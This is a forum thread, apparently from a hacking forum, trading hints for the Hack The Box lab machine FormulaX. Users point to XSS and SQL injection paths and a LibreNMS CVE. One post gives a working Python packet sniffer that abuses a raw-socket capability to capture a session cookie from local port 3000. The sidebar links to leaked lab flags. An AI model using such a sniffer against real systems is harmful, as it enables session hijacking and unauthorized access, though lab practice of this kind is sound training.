HTB - FormulaX
by paven - Saturday March 9, 2024 at 12:54 PM
#31
(03-10-2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS

can you help with the xss?
[/quote]

Here is the walkthrough video : https://youtu.be/e4g3_cNU6do

(03-10-2024, 08:43 PM)geoblitz Wrote: Any help with root?

Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do

(03-10-2024, 01:56 PM)Th35t0rm Wrote: same here , any hint for becoming admin

found a sqli but cant dump the db , only current_user , hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/

Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
Reply
#32
(03-11-2024, 06:16 AM)dolare141 Wrote:
(03-10-2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS

can you help with the xss?

Here is the walkthrough video : https://youtu.be/e4g3_cNU6do

(03-10-2024, 08:43 PM)geoblitz Wrote: Any help with root?

Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do

(03-10-2024, 01:56 PM)Th35t0rm Wrote: same here , any hint for becoming admin

found a sqli but cant dump the db , only current_user , hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/

Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
[/quote]

ty for the help
Reply
#33
Here is my method to get librenms from www-data.

/usr/bin/python3.10 has the cap_net_raw capabilities so you can sniff raw socket.

Just download on your local box the pcap and dpkt pip package, make an archive and upload it to the box next in the same directory of the followging code.

It will dump the tcp 3000 port traffic and You can get the cookie to login to the librenms web interface

import pcap
import dpkt

def decode_udp(packet):
    eth = dpkt.ethernet.Ethernet(packet)

    if not isinstance(eth.data, dpkt.ip.IP):
        return None

    ip = eth.data

    if not isinstance(ip.data, dpkt.tcp.TCP):
        return None

    tcp = ip.data

    if tcp.dport == 3000:
        return tcp.data

def main():
    interface = 'lo'  # Change to your interface
    pc = pcap.pcap(name=interface,  promisc=True,  immediate=True)

    for timestamp, packet in pc:
        data = decode_udp(packet)
        if data:
            print("Received TCP packet on port 80:")
            print(data.decode('utf-8', 'ignore'))

if __name__ == "__main__":
    main()
Reply
#34
thanks for sharing the tips :-)
Reply
#35
(03-11-2024, 06:16 AM)dolare141 Wrote:
(03-10-2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS

can you help with the xss?

Here is the walkthrough video : https://youtu.be/e4g3_cNU6do

(03-10-2024, 08:43 PM)geoblitz Wrote: Any help with root?

Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do

(03-10-2024, 01:56 PM)Th35t0rm Wrote: same here , any hint for becoming admin

found a sqli but cant dump the db , only current_user , hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/

Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
[/quote]

after got message connected but does need setting the netcat to listen or something to move to root
Reply
#36
how can i become admin on librenms? I tried CVE-2023-5591 but i can't make it work...
Reply
#37
rooted.
Insane for me but rooted at all.
PM for hints
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 91 7,570 Yesterday, 07:45 AM
Last Post: ukaugse
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 364 88,805 04-07-2026, 07:41 PM
Last Post: napo22
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 2,360 03-28-2026, 03:30 AM
Last Post: lulaladrow
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 358 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 654 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: